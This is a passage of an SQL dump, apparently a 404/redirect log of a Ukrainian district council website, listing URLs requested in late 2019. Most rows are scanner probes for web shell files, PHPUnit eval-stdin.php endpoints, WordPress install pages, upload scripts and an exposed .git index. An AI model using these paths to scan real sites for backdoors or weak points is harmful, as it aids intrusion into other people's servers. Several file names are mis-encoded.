00:00:00',301),(33813,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1492-pro-vnesennya-zmin-do-shtatnikh-rozpisiv-komunalnikh-zakladiv-kulturi',NULL,'','',1,0,'2019-10-10 00:24:19','0000-00-00 00:00:00',301),(33814,'https://malyn-rayrada.gov.ua/dzsyzwfenjmbkz.html',NULL,'','',1,0,'2019-10-10 22:32:00','0000-00-00 00:00:00',301),(33815,'https://malyn-rayrada.gov.ua/te3/signup.php',NULL,'','',1,0,'2019-10-12 05:01:50','0000-00-00 00:00:00',301),(33816,'https://malyn-rayrada.gov.ua/wp-blog-mail.php',NULL,'http://site.ru','',3,0,'2019-10-14 21:21:46','0000-00-00 00:00:00',301),(33817,'https://malyn-rayrada.gov.ua/assets/images/content-post.php',NULL,'http://site.ru','',7,0,'2019-10-14 22:32:19','0000-00-00 00:00:00',301),(33818,'https://malyn-rayrada.gov.ua/dhon.php',NULL,'http://site.ru','',5,0,'2019-10-14 22:47:00','0000-00-00 00:00:00',301),(33819,'https://malyn-rayrada.gov.ua/s.php',NULL,'http://site.ru','',5,0,'2019-10-15 05:41:51','0000-00-00 00:00:00',301),(33820,'https://malyn-rayrada.gov.ua/wp-backup.php',NULL,'http://site.ru','',3,0,'2019-10-15 09:21:14','0000-00-00 00:00:00',301),(33821,'https://malyn-rayrada.gov.ua/tools/popup-pomo.php',NULL,'http://site.ru','',5,0,'2019-10-15 10:51:16','0000-00-00 00:00:00',301),(33822,'https://malyn-rayrada.gov.ua/master.php',NULL,'http://site.ru','',24,0,'2019-10-15 17:13:40','0000-00-00 00:00:00',301),(33823,'https://malyn-rayrada.gov.ua/manager/popup-pomo.php',NULL,'http://site.ru','',3,0,'2019-10-16 06:22:21','0000-00-00 00:00:00',301),(33824,'https://malyn-rayrada.gov.ua/meuhy.php',NULL,'http://site.ru','',3,0,'2019-10-16 09:00:18','0000-00-00 00:00:00',301),(33825,'https://malyn-rayrada.gov.ua/tags.php',NULL,'http://site.ru','',4,0,'2019-10-16 10:43:53','0000-00-00 00:00:00',301),(33826,'https://malyn-rayrada.gov.ua/about.php',NULL,'http://site.ru','',5,0,'2019-10-16 14:28:50','0000-00-00 00:00:00',301),(33827,'https://malyn-rayrada.gov.ua/content-post.php',NULL,'http://site.ru','',5,0,'2019-10-16 17:49:41','0000-00-00 00:00:00',301),(33828,'https://malyn-rayrada.gov.ua/aul.php',NULL,'http://site.ru','',1,0,'2019-10-16 18:13:30','0000-00-00 00:00:00',301),(33829,'https://malyn-rayrada.gov.ua/.wp-trc.php',NULL,'http://site.ru','',1,0,'2019-10-16 21:53:50','0000-00-00 00:00:00',301),(33830,'https://malyn-rayrada.gov.ua/authorize.php',NULL,'http://site.ru','',2,0,'2019-10-16 23:38:12','0000-00-00 00:00:00',301),(33831,'https://malyn-rayrada.gov.ua/f.php',NULL,'http://site.ru','',1,0,'2019-10-17 01:43:38','0000-00-00 00:00:00',301),(33832,'https://malyn-rayrada.gov.ua/ler.php',NULL,'http://site.ru','',2,0,'2019-10-17 02:25:01','0000-00-00 00:00:00',301),(33833,'https://malyn-rayrada.gov.ua/error_log',NULL,'https://malyn-rayrada.gov.ua/','',1,0,'2019-10-17 04:53:34','0000-00-00 00:00:00',301),(33834,'https://malyn-rayrada.gov.ua/licensed.php',NULL,'http://site.ru','',10,0,'2019-10-17 09:11:21','0000-00-00 00:00:00',301),(33835,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.4/feal.php',NULL,'http://site.ru','',2,0,'2019-10-17 09:57:19','0000-00-00 00:00:00',301),(33836,'https://malyn-rayrada.gov.ua/pasts.php',NULL,'http://site.ru','',2,0,'2019-10-17 10:56:51','0000-00-00 00:00:00',301),(33837,'https://malyn-rayrada.gov.ua/word-defence-waf.php',NULL,'http://site.ru','',4,0,'2019-10-17 11:22:11','0000-00-00 00:00:00',301),(33838,'https://malyn-rayrada.gov.ua/media/mod.php',NULL,'http://site.ru','',10,0,'2019-10-17 12:36:16','0000-00-00 00:00:00',301),(33839,'https://malyn-rayrada.gov.ua/modules/img/mode.php',NULL,'http://site.ru','',3,0,'2019-10-17 13:07:34','0000-00-00 00:00:00',301),(33840,'https://malyn-rayrada.gov.ua/libraries/joomla/template/content-post.php',NULL,'http://site.ru','',6,0,'2019-10-17 13:27:16','0000-00-00 00:00:00',301),(33841,'https://malyn-rayrada.gov.ua/bypass.php',NULL,'http://site.ru','',5,0,'2019-10-17 13:28:59','0000-00-00 00:00:00',301),(33842,'https://malyn-rayrada.gov.ua/libraries/joomla/template/wp-cofigs.php',NULL,'http://site.ru','',1,0,'2019-10-17 13:29:26','0000-00-00 00:00:00',301),(33843,'https://malyn-rayrada.gov.ua/olad.php',NULL,'http://site.ru','',6,0,'2019-10-17 14:08:45','0000-00-00 00:00:00',301),(33844,'https://malyn-rayrada.gov.ua/fresh1.php',NULL,'http://site.ru','',1,0,'2019-10-17 14:34:06','0000-00-00 00:00:00',301),(33845,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2265-pro-programu-nadannya-bezoplatnoji-pravovoji-dopomogi-naselennyu-malinskogo-rajonu-na-2020-2021-roki',NULL,'','',23,0,'2019-10-19 13:13:40','0000-00-00 00:00:00',301),(33846,'https://malyn-rayrada.gov.ua/raqejifyyp.html',NULL,'','',1,0,'2019-10-22 12:02:04','0000-00-00 00:00:00',301),(33847,'https://malyn-rayrada.gov.ua/components/modules.php',NULL,'','',1,0,'2019-10-23 09:38:31','0000-00-00 00:00:00',301),(33848,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2266-pro-programu-z-lokalizatsiji-ta-provedennya-borotbi-z-amerikanskim-bilim-metelikom-na-teritoriji-malinskogo-rajonu-na-2019-2023-roki',NULL,'','',23,0,'2019-10-23 10:11:52','0000-00-00 00:00:00',301),(33849,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2265-pro-programu-nadannya-bezoplatnoji-pravovoji-dopomogi-naselennyu-malinskogo-rajonu-na-2020-2021-roki',NULL,'','',7,0,'2019-10-25 23:50:15','0000-00-00 00:00:00',301),(33850,'https://malyn-rayrada.gov.ua//wp-login.php',NULL,'http://www.google.com.hk','',22,0,'2019-10-26 14:30:15','0000-00-00 00:00:00',301),(33851,'https://malyn-rayrada.gov.ua/index.php/1607-pro-sklikannya-14-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',4,0,'2019-10-29 21:42:21','0000-00-00 00:00:00',301),(33852,'https://malyn-rayrada.gov.ua/wp-load.php?up2018info=1',NULL,'','',1,0,'2019-10-30 20:01:01','0000-00-00 00:00:00',301),(33853,'https://malyn-rayrada.gov.ua/wp.php?up2018info=1',NULL,'','',1,0,'2019-10-31 14:31:44','0000-00-00 00:00:00',301),(33854,'https://malyn-rayrada.gov.ua/wp-bb.php?up2018info=1',NULL,'','',1,0,'2019-11-01 08:44:52','0000-00-00 00:00:00',301),(33855,'https://malyn-rayrada.gov.ua/wp-aa.php?up2018info=1',NULL,'','',1,0,'2019-11-02 02:51:07','0000-00-00 00:00:00',301),(33856,'https://malyn-rayrada.gov.ua/accesson.php',NULL,'','',3,0,'2019-11-02 19:31:07','0000-00-00 00:00:00',301),(33857,'https://malyn-rayrada.gov.ua/wp/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:07:40','0000-00-00 00:00:00',301),(33858,'https://malyn-rayrada.gov.ua/backup/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:08:49','0000-00-00 00:00:00',301),(33859,'https://malyn-rayrada.gov.ua/bk/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:09:58','0000-00-00 00:00:00',301),(33860,'https://malyn-rayrada.gov.ua/new/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:10:42','0000-00-00 00:00:00',301),(33861,'https://malyn-rayrada.gov.ua/old/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:11:08','0000-00-00 00:00:00',301),(33862,'https://malyn-rayrada.gov.ua/blog/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:11:30','0000-00-00 00:00:00',301),(33863,'https://malyn-rayrada.gov.ua/test/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:11:47','0000-00-00 00:00:00',301),(33864,'https://malyn-rayrada.gov.ua/cms/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:12:06','0000-00-00 00:00:00',301),(33865,'https://malyn-rayrada.gov.ua/demo/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:12:39','0000-00-00 00:00:00',301),(33866,'https://malyn-rayrada.gov.ua/temp/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:13:12','0000-00-00 00:00:00',301),(33867,'https://malyn-rayrada.gov.ua/home/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:13:53','0000-00-00 00:00:00',301),(33868,'https://malyn-rayrada.gov.ua/main/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:14:30','0000-00-00 00:00:00',301),(33869,'https://malyn-rayrada.gov.ua/site/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:14:59','0000-00-00 00:00:00',301),(33870,'https://malyn-rayrada.gov.ua/tmp/wp-admin/install.php',NULL,'','',1,0,'2019-11-04 12:15:25','0000-00-00 00:00:00',301),(33871,'https://www.malyn-rayrada.gov.ua/attachments/article/1788/ñ€ðµð¹ñ‚ð¸ð½ð³ ð¿ðµñ€ñˆðµ ð¿ñ–ð²ñ€ñ–ñ‡ñ‡ñ  2017.pdf',NULL,'','',1,0,'2019-11-04 19:42:10','0000-00-00 00:00:00',301),(33872,'https://malyn-rayrada.gov.ua/.git/index',NULL,'http://malyn-rayrada.gov.ua/.git/index','',2,0,'2019-11-05 13:09:57','0000-00-00 00:00:00',301),(33873,'https://malyn-rayrada.gov.ua/events',NULL,'','',1,0,'2019-11-06 02:52:37','0000-00-00 00:00:00',301),(33874,'https://malyn-rayrada.gov.ua/attachments/article/1481/ð¾ð±ñ”ð´ð½ð°ð½ð½ñ .pdf',NULL,'','',1,0,'2019-11-08 08:10:55','0000-00-00 00:00:00',301),(33875,'https://malyn-rayrada.gov.ua/attachments/article/2279/ðÿð’ðÿð“.pdf',NULL,'','',1,0,'2019-11-09 08:28:54','0000-00-00 00:00:00',301),(33876,'https://www.malyn-rayrada.gov.ua/attachments/article/1858/ð£ðÿð¡ð—ð .pdf',NULL,'','',10,0,'2019-11-11 19:58:32','0000-00-00 00:00:00',301),(33877,'https://malyn-rayrada.gov.ua/vendor/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-13 02:56:09','0000-00-00 00:00:00',301),(33878,'https://malyn-rayrada.gov.ua/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-13 02:56:35','0000-00-00 00:00:00',301),(33879,'https://malyn-rayrada.gov.ua/phpunit/src/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-13 02:57:02','0000-00-00 00:00:00',301),(33880,'https://malyn-rayrada.gov.ua/phpunit/util/php/eval-stdin.php',NULL,'','',4,0,'2019-11-13 02:57:22','0000-00-00 00:00:00',301),(33881,'https://malyn-rayrada.gov.ua/lib/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',5,0,'2019-11-13 02:57:46','0000-00-00 00:00:00',301),(33882,'https://malyn-rayrada.gov.ua/lib/phpunit/phpunit/util/php/eval-stdin.php',NULL,'','',5,0,'2019-11-13 02:58:11','0000-00-00 00:00:00',301),(33883,'https://malyn-rayrada.gov.ua/lib/phpunit/util/php/eval-stdin.php',NULL,'','',5,0,'2019-11-13 02:58:39','0000-00-00 00:00:00',301),(33884,'https://malyn-rayrada.gov.ua/panel/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',5,0,'2019-11-13 02:59:03','0000-00-00 00:00:00',301),(33885,'https://malyn-rayrada.gov.ua/admin/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',8,0,'2019-11-13 02:59:37','0000-00-00 00:00:00',301),(33886,'https://malyn-rayrada.gov.ua/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',7,0,'2019-11-13 03:00:03','0000-00-00 00:00:00',301),(33887,'https://malyn-rayrada.gov.ua/attachments/article/1709/ñ€ñ–ñˆ ð·ð¼ñ–ð½ ðÿñ€ð¾ð³ ð¿ð¾ð¶ ð±ðµð·ð¿.pdf',NULL,'','',1,0,'2019-11-13 20:44:26','0000-00-00 00:00:00',301),(33888,'https://malyn-rayrada.gov.ua//admin',NULL,'','',35,0,'2019-11-13 21:58:20','0000-00-00 00:00:00',301),(33889,'https://www.malyn-rayrada.gov.ua//admin',NULL,'','',6,0,'2019-11-13 22:00:09','0000-00-00 00:00:00',301),(33890,'https://malyn-rayrada.gov.ua/support',NULL,'','',1,0,'2019-11-13 22:03:18','0000-00-00 00:00:00',301),(33891,'https://malyn-rayrada.gov.ua/contact',NULL,'','',1,0,'2019-11-13 22:03:28','0000-00-00 00:00:00',301),(33892,'https://malyn-rayrada.gov.ua/contacts',NULL,'','',1,0,'2019-11-13 22:03:43','0000-00-00 00:00:00',301),(33893,'https://malyn-rayrada.gov.ua/accesson1.php',NULL,'https://malyn-rayrada.gov.ua/accesson1.php','',5,0,'2019-11-13 23:50:34','0000-00-00 00:00:00',301),(33894,'https://malyn-rayrada.gov.ua/wp-content/plugins/upspy/index.php',NULL,'','',3,0,'2019-11-15 07:46:17','0000-00-00 00:00:00',301),(33895,'https://malyn-rayrada.gov.ua/wp-content/plugins/ubh/index.php',NULL,'','',3,0,'2019-11-15 07:46:21','0000-00-00 00:00:00',301),(33896,'https://malyn-rayrada.gov.ua/wp-content/plugins/vwcleanerplugin/bump.php?cache',NULL,'','',3,0,'2019-11-15 07:46:22','0000-00-00 00:00:00',301),(33897,'https://malyn-rayrada.gov.ua/wp-content/plugins/xichang/x.php?xi',NULL,'','',3,0,'2019-11-15 07:46:24','0000-00-00 00:00:00',301),(33898,'https://malyn-rayrada.gov.ua/wp-content/plugins/html404/index.html',NULL,'','',3,0,'2019-11-15 07:46:26','0000-00-00 00:00:00',301),(33899,'https://malyn-rayrada.gov.ua/wp-admin/shapes.php',NULL,'','',3,0,'2019-11-15 07:46:28','0000-00-00 00:00:00',301),(33900,'https://malyn-rayrada.gov.ua/olux.php',NULL,'','',12,0,'2019-11-15 07:46:32','0000-00-00 00:00:00',301),(33901,'https://malyn-rayrada.gov.ua/indoxploit.php',NULL,'','',12,0,'2019-11-15 07:46:35','0000-00-00 00:00:00',301),(33902,'https://malyn-rayrada.gov.ua/xxx.php',NULL,'','',7,0,'2019-11-15 07:46:37','0000-00-00 00:00:00',301),(33903,'https://malyn-rayrada.gov.ua/wp-content/plugins/css-ready-sel/file.php',NULL,'','',1,0,'2019-11-15 07:46:42','0000-00-00 00:00:00',301),(33904,'https://malyn-rayrada.gov.ua/wp-content/plugins/css-ready/file.php',NULL,'','',1,0,'2019-11-15 07:46:44','0000-00-00 00:00:00',301),(33905,'https://malyn-rayrada.gov.ua/wp-content/plugins/css-ready-sele/file.php',NULL,'','',1,0,'2019-11-15 07:46:46','0000-00-00 00:00:00',301),(33906,'https://malyn-rayrada.gov.ua/wp-content/think.php',NULL,'','',1,0,'2019-11-15 07:46:46','0000-00-00 00:00:00',301),(33907,'https://malyn-rayrada.gov.ua/wp-content/uploads/test.php',NULL,'','',1,0,'2019-11-15 07:46:48','0000-00-00 00:00:00',301),(33908,'https://malyn-rayrada.gov.ua/wp-content/uploads/content-post.php',NULL,'','',1,0,'2019-11-15 07:46:49','0000-00-00 00:00:00',301),(33909,'https://malyn-rayrada.gov.ua/wp-content/uploads/new_license.php',NULL,'','',1,0,'2019-11-15 07:46:51','0000-00-00 00:00:00',301),(33910,'https://malyn-rayrada.gov.ua/wp-content/plugins/gravityforms/gravityforms.php?abdullkarem',NULL,'','',1,0,'2019-11-15 07:46:53','0000-00-00 00:00:00',301),(33911,'https://malyn-rayrada.gov.ua/wp-content/themes/gaukingo/db.php',NULL,'','',1,0,'2019-11-15 07:46:54','0000-00-00 00:00:00',301),(33912,'https://malyn-rayrada.gov.ua/wp-content/plugins/three-column-screen-layout/db.php',NULL,'','',1,0,'2019-11-15 07:46:56','0000-00-00 00:00:00',301),(33913,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-db-ajax-made/wp-ajax.php',NULL,'','',1,0,'2019-11-15 07:46:58','0000-00-00 00:00:00',301),(33914,'https://malyn-rayrada.gov.ua/upload.php',NULL,'','',10,0,'2019-11-15 07:47:04','0000-00-00 00:00:00',301),(33915,'https://malyn-rayrada.gov.ua/wp-content/uploads/',NULL,'','',3,0,'2019-11-15 07:47:06','0000-00-00 00:00:00',301),(33916,'https://malyn-rayrada.gov.ua/wp-content/uploads/2019/11/',NULL,'','',1,0,'2019-11-15 07:47:14','0000-00-00 00:00:00',301),(33917,'https://malyn-rayrada.gov.ua/wp-content/uploads/up.php',NULL,'','',1,0,'2019-11-15 07:47:16','0000-00-00 00:00:00',301),(33918,'https://malyn-rayrada.gov.ua/uploader.php',NULL,'','',1,0,'2019-11-15 07:47:17','0000-00-00 00:00:00',301),(33919,'https://malyn-rayrada.gov.ua/payload.php',NULL,'','',1,0,'2019-11-15 07:47:19','0000-00-00 00:00:00',301),(33920,'https://malyn-rayrada.gov.ua/wp-admin/network/wp-footer.php',NULL,'','',3,0,'2019-11-15 07:47:20','0000-00-00 00:00:00',301),(33921,'https://malyn-rayrada.gov.ua/wp-info.php',NULL,'','',4,0,'2019-11-15 07:47:22','0000-00-00 00:00:00',301),(33922,'https://malyn-rayrada.gov.ua/wp-content/vuln.php',NULL,'','',3,0,'2019-11-15 07:47:24','0000-00-00 00:00:00',301),(33923,'https://malyn-rayrada.gov.ua/upel.php',NULL,'','',3,0,'2019-11-15 07:47:25','0000-00-00 00:00:00',301),(33924,'https://malyn-rayrada.gov.ua/wp-content/plugins/ppus/up.php',NULL,'','',3,0,'2019-11-15 07:47:27','0000-00-00 00:00:00',301),(33925,'https://malyn-rayrada.gov.ua/098.php',NULL,'','',3,0,'2019-11-15 07:47:28','0000-00-00 00:00:00',301),(33926,'https://malyn-rayrada.gov.ua/wp-content/uploads/class_akismet.php',NULL,'','',1,0,'2019-11-15 07:47:30','0000-00-00 00:00:00',301),(33927,'https://malyn-rayrada.gov.ua/new_license.php',NULL,'','',3,0,'2019-11-15 07:47:32','0000-00-00 00:00:00',301),(33928,'https://malyn-rayrada.gov.ua/wp-content/plugins/theme-configurator/mini.php',NULL,'','',3,0,'2019-11-15 07:47:33','0000-00-00 00:00:00',301),(33929,'https://malyn-rayrada.gov.ua/wp-content/plugins/widget-logic/mini.php',NULL,'','',3,0,'2019-11-15 07:47:34','0000-00-00 00:00:00',301),(33930,'https://malyn-rayrada.gov.ua/wp-content/plugins/wp-admin-manager/up.php',NULL,'','',1,0,'2019-11-15 07:47:40','0000-00-00 00:00:00',301),(33931,'https://malyn-rayrada.gov.ua/wp-content/uploads/2019/11/content-post.php',NULL,'','',1,0,'2019-11-15 07:47:50','0000-00-00 00:00:00',301),(33932,'https://malyn-rayrada.gov.ua/wp-content/uploads/2019/11/new_license.php',NULL,'','',1,0,'2019-11-15 07:47:56','0000-00-00 00:00:00',301),(33933,'https://malyn-rayrada.gov.ua/wp-content/uploads/new_up.php',NULL,'','',1,0,'2019-11-15 07:47:59','0000-00-00 00:00:00',301),(33934,'https://malyn-rayrada.gov.ua/z.php',NULL,'','',4,0,'2019-11-15 07:48:08','0000-00-00 00:00:00',301),(33935,'https://malyn-rayrada.gov.ua/d.php',NULL,'','',5,0,'2019-11-15 07:48:08','0000-00-00 00:00:00',301),(33936,'https://malyn-rayrada.gov.ua/o.php',NULL,'','',6,0,'2019-11-15 07:48:09','0000-00-00 00:00:00',301),(33937,'https://malyn-rayrada.gov.ua/t.php',NULL,'','',4,0,'2019-11-15 07:48:11','0000-00-00 00:00:00',301),(33938,'https://malyn-rayrada.gov.ua/e.php',NULL,'','',4,0,'2019-11-15 07:48:25','0000-00-00 00:00:00',301),(33939,'https://malyn-rayrada.gov.ua/m.php',NULL,'','',10,0,'2019-11-15 07:48:26','0000-00-00 00:00:00',301),(33940,'https://malyn-rayrada.gov.ua/wp.php',NULL,'','',12,0,'2019-11-15 07:48:29','0000-00-00 00:00:00',301),(33941,'https://malyn-rayrada.gov.ua/cpanel.php',NULL,'','',4,0,'2019-11-15 07:48:31','0000-00-00 00:00:00',301),(33942,'https://malyn-rayrada.gov.ua/cp.php',NULL,'','',4,0,'2019-11-15 07:48:32','0000-00-00 00:00:00',301),(33943,'https://malyn-rayrada.gov.ua/root.php',NULL,'','',4,0,'2019-11-15 07:48:33','0000-00-00 00:00:00',301),(33944,'https://malyn-rayrada.gov.ua/modules/modules/modules.php',NULL,'','',5,0,'2019-11-15 07:48:41','0000-00-00 00:00:00',301),(33945,'https://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/clean.php',NULL,'','',5,0,'2019-11-15 07:48:44','0000-00-00 00:00:00',301),(33946,'https://malyn-rayrada.gov.ua/libraries/joomla/css.php',NULL,'','',5,0,'2019-11-15 07:48:47','0000-00-00 00:00:00',301),(33947,'https://malyn-rayrada.gov.ua/libraries/joomla/jmails.php?u',NULL,'','',5,0,'2019-11-15 07:48:48','0000-00-00 00:00:00',301),(33948,'https://malyn-rayrada.gov.ua/libraries/joomla/jmail.php?u',NULL,'','',5,0,'2019-11-15 07:48:50','0000-00-00 00:00:00',301),(33949,'https://malyn-rayrada.gov.ua/rxr.php?rxr',NULL,'','',1,0,'2019-11-15 07:48:55','0000-00-00 00:00:00',301),(33950,'https://malyn-rayrada.gov.ua/rxr.php',NULL,'','',9,0,'2019-11-15 07:49:01','0000-00-00 00:00:00',301),(33951,'https://malyn-rayrada.gov.ua/components/com_b2jcontact/izoc.php',NULL,'','',5,0,'2019-11-15 07:49:02','0000-00-00 00:00:00',301),(33952,'https://malyn-rayrada.gov.ua/v5.php',NULL,'','',7,0,'2019-11-15 07:49:07','0000-00-00 00:00:00',301),(33953,'https://malyn-rayrada.gov.ua/images/stories/cmd.php',NULL,'','',2,0,'2019-11-15 07:49:08','0000-00-00 00:00:00',301),(33954,'https://malyn-rayrada.gov.ua/images/jsspwneed.php',NULL,'','',2,0,'2019-11-15 07:49:09','0000-00-00 00:00:00',301),(33955,'https://malyn-rayrada.gov.ua/templates/beez/index.php',NULL,'','',11,0,'2019-11-15 07:49:34','0000-00-00 00:00:00',301),(33956,'https://malyn-rayrada.gov.ua/templates/ja_purity/index.php',NULL,'','',7,0,'2019-11-15 07:49:36','0000-00-00 00:00:00',301),(33957,'https://malyn-rayrada.gov.ua/templates/rhuk_milkyway/index.php',NULL,'','',5,0,'2019-11-15 07:49:38','0000-00-00 00:00:00',301),(33958,'https://malyn-rayrada.gov.ua/templates/rada2019yt/error.php',NULL,'','',5,0,'2019-11-15 07:49:39','0000-00-00 00:00:00',301),(33959,'https://malyn-rayrada.gov.ua/templates/beez_3/index.php',NULL,'','',2,0,'2019-11-15 07:50:05','0000-00-00 00:00:00',301),(33960,'https://malyn-rayrada.gov.ua/uploads/',NULL,'','',2,0,'2019-11-15 07:51:03','0000-00-00 00:00:00',301),(33961,'https://malyn-rayrada.gov.ua/img/',NULL,'','',2,0,'2019-11-15 07:51:04','0000-00-00 00:00:00',301),(33962,'https://malyn-rayrada.gov.ua/upload/',NULL,'','',2,0,'2019-11-15 07:51:06','0000-00-00 00:00:00',301),(33963,'https://malyn-rayrada.gov.ua/gallery/',NULL,'','',2,0,'2019-11-15 07:51:07','0000-00-00 00:00:00',301),(33964,'https://malyn-rayrada.gov.ua/files/',NULL,'','',2,0,'2019-11-15 07:51:09','0000-00-00 00:00:00',301),(33965,'https://malyn-rayrada.gov.ua/pdf/',NULL,'','',2,0,'2019-11-15 07:51:11','0000-00-00 00:00:00',301),(33966,'https://malyn-rayrada.gov.ua/docs/',NULL,'','',2,0,'2019-11-15 07:51:17','0000-00-00 00:00:00',301),(33967,'https://www.malyn-rayrada.gov.ua/wp-includes/css/modules.php',NULL,'','',1,0,'2019-11-15 08:33:58','0000-00-00 00:00:00',301),(33968,'https://www.malyn-rayrada.gov.ua/wso.php',NULL,'','',3,0,'2019-11-15 08:33:59','0000-00-00 00:00:00',301),(33969,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/upspy/index.php',NULL,'','',1,0,'2019-11-15 08:34:00','0000-00-00 00:00:00',301),(33970,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/ubh/index.php',NULL,'','',1,0,'2019-11-15 08:34:02','0000-00-00 00:00:00',301),(33971,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/vwcleanerplugin/bump.php?cache',NULL,'','',1,0,'2019-11-15 08:34:05','0000-00-00 00:00:00',301),(33972,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/xichang/x.php?xi',NULL,'','',1,0,'2019-11-15 08:34:08','0000-00-00 00:00:00',301),(33973,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/html404/index.html',NULL,'','',1,0,'2019-11-15 08:34:09','0000-00-00 00:00:00',301),(33974,'https://www.malyn-rayrada.gov.ua/wp-admin/shapes.php',NULL,'','',1,0,'2019-11-15 08:34:09','0000-00-00 00:00:00',301),(33975,'https://www.malyn-rayrada.gov.ua/olux.php',NULL,'','',3,0,'2019-11-15 08:34:13','0000-00-00 00:00:00',301),(33976,'https://www.malyn-rayrada.gov.ua/indoxploit.php',NULL,'','',4,0,'2019-11-15 08:34:14','0000-00-00 00:00:00',301),(33977,'https://www.malyn-rayrada.gov.ua/xxx.php',NULL,'','',2,0,'2019-11-15 08:34:15','0000-00-00 00:00:00',301),(33978,'https://www.malyn-rayrada.gov.ua/marvins.php',NULL,'','',2,0,'2019-11-15 08:34:17','0000-00-00 00:00:00',301),(33979,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/css-ready-sel/file.php',NULL,'','',1,0,'2019-11-15 08:34:21','0000-00-00 00:00:00',301),(33980,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/css-ready/file.php',NULL,'','',1,0,'2019-11-15 08:34:22','0000-00-00 00:00:00',301),(33981,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/css-ready-sele/file.php',NULL,'','',1,0,'2019-11-15 08:34:23','0000-00-00 00:00:00',301),(33982,'https://www.malyn-rayrada.gov.ua/wp-content/think.php',NULL,'','',1,0,'2019-11-15 08:34:24','0000-00-00 00:00:00',301),(33983,'https://www.malyn-rayrada.gov.ua/wp-content/uploads/test.php',NULL,'','',1,0,'2019-11-15 08:34:25','0000-00-00 00:00:00',301),(33984,'https://www.malyn-rayrada.gov.ua/wp-content/uploads/content-post.php',NULL,'','',1,0,'2019-11-15 08:34:27','0000-00-00 00:00:00',301),(33985,'https://www.malyn-rayrada.gov.ua/wp-content/uploads/new_license.php',NULL,'','',1,0,'2019-11-15 08:34:30','0000-00-00 00:00:00',301),(33986,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/gravityforms/gravityforms.php?abdullkarem',NULL,'','',1,0,'2019-11-15 08:34:32','0000-00-00 00:00:00',301),(33987,'https://www.malyn-rayrada.gov.ua/wp-content/themes/gaukingo/db.php',NULL,'','',1,0,'2019-11-15 08:34:34','0000-00-00 00:00:00',301),(33988,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/three-column-screen-layout/db.php',NULL,'','',1,0,'2019-11-15 08:34:34','0000-00-00 00:00:00',301),(33989,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-db-ajax-made/wp-ajax.php',NULL,'','',1,0,'2019-11-15 08:34:35','0000-00-00 00:00:00',301),(33990,'https://www.malyn-rayrada.gov.ua/up.php',NULL,'','',3,0,'2019-11-15 08:34:42','0000-00-00 00:00:00',301),(33991,'https://www.malyn-rayrada.gov.ua/upload.php',NULL,'','',3,0,'2019-11-15 08:34:46','0000-00-00 00:00:00',301),(33992,'https://www.malyn-rayrada.gov.ua/wp-content/uploads/',NULL,'','',1,0,'2019-11-15 08:34:48','0000-00-00 00:00:00',301),(33993,'https://www.malyn-rayrada.gov.ua/wp-content/uploads/2019/11/',NULL,'','',1,0,'2019-11-15 08:34:49','0000-00-00 00:00:00',301),(33994,'https://www.malyn-rayrada.gov.ua/shell.php',NULL,'','',3,0,'2019-11-15 08:34:51','0000-00-00 00:00:00',301),(33995,'https://www.malyn-rayrada.gov.ua/wp-content/uploads/up.php',NULL,'','',1,0,'2019-11-15 08:34:57','0000-00-00 00:00:00',301),(33996,'https://www.malyn-rayrada.gov.ua/uploader.php',NULL,'','',1,0,'2019-11-15 08:35:02','0000-00-00 00:00:00',301),(33997,'https://www.malyn-rayrada.gov.ua/payload.php',NULL,'','',1,0,'2019-11-15 08:35:08','0000-00-00 00:00:00',301),(33998,'https://www.malyn-rayrada.gov.ua/wp-admin/network/wp-footer.php',NULL,'','',1,0,'2019-11-15 08:35:11','0000-00-00 00:00:00',301),(33999,'https://www.malyn-rayrada.gov.ua/wp-info.php',NULL,'','',1,0,'2019-11-15 08:35:15','0000-00-00 00:00:00',301),(34000,'https://www.malyn-rayrada.gov.ua/wp-content/vuln.php',NULL,'','',1,0,'2019-11-15 08:35:19','0000-00-00 00:00:00',301),(34001,'https://www.malyn-rayrada.gov.ua/upel.php',NULL,'','',1,0,'2019-11-15 08:35:21','0000-00-00 00:00:00',301),(34002,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/ppus/up.php',NULL,'','',1,0,'2019-11-15 08:35:23','0000-00-00 00:00:00',301),(34003,'https://www.malyn-rayrada.gov.ua/098.php',NULL,'','',1,0,'2019-11-15 